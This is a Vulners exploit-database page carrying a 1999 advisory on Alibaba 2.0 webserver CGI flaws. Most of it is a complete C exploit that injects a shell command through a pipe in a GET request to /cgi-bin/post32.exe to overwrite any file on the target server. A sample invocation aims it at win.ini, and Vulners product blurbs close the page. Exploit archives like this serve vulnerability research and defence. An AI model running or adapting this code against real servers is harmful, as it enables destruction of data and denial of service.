Vulners
Lucene search
Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilities
// source: https://www.securityfocus.com/bid/770/info
There are several CGI programs that ship with the Alibaba webserver. Many of these do not do proper input handling, and therefore will allow requests for access to files outside of normal or safe webserver practice. This results in various situations where an attacker can view, overwrite, create and delete files anywhere on the server.
/*
Description: DoS against Alibaba 2.0 WebServer by wildcoyote
Comments : Based on advisorie by Prizm<[email protected]>
It is possible to overwrite any file on the remote box!
Platforms : Alibaba runs on Win95/98/NT
Flamez to : [email protected]
*/
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
// If it didnt work, uncomment (JUST ONE) of the following defines...
// (In case of one of them, isn't present...)
#define vulnerable_cgi "/cgi-bin/post32.exe"
// #define vulnerable_cgi "/cgi-bin/post16.exe"
// #define vulnerable_cgi "/cgi-bin/get16.exe"
int
openhost(char *host,int port) {
int sock;
struct sockaddr_in addr;
struct hostent *he;
he=gethostbyname(host);
if (he==NULL) return -1;
sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
if (sock==-1) return -1;
memcpy(&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock=-1;
return sock;
}
void
sends(int sock,char *buf) {
write(sock,buf,strlen(buf));
}
void
overwrite(char *host, char *file, int port)
{
int sock,i;
char buf[512];
printf("\nAlibaba 2.0 WebServer File Overwrite Xploit by wildcoyote\n\n");
printf("Trying to connect to %s (%d)....(please wait)\n",host,port);
sock=openhost(host,port);
if(sock==-1) {
printf("- Could not connect -\n");
printf("Exiting...\n\n");
exit(-1);
}
else printf("Connected to %s (%d)\n",host,port);
sprintf(buf,"GET %s|echo%20>%s\n\n",vulnerable_cgi,file);
printf("Oh k! Trying to overwrite the file...\n");
sends(sock,buf);
close(sock);
printf("All done, the file was *probably* overwrited ;)\n");
printf("Send flamez to [email protected], *Enjoy*...\n\n");
}
main(int argc, char *argv[])
{
int sock,i;
if (argc<3) {
printf("\nAlibaba 2.0 WebServer File Overwrite Xploit by wildcoyote\n\n");
printf("Sintaxe: %s <host> <path to file to overwrite> [port - default 80]\n",argv[0]);
printf("Warning: Path to file must be a valid DoS path :)\n");
printf("Evil Example: %s www.vulnerable.alibaba.com c:\\windows\\win.ini\n",argv[0]);
printf("Send flamez to [email protected], *Enjoy*...\n\n");
}
else if (argc==3) overwrite(argv[1],argv[2],80);
else overwrite(argv[1],argv[2],atoi(argv[3]));
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Nov 1999 00:00Current
7.4High risk
Vulners AI Score7.4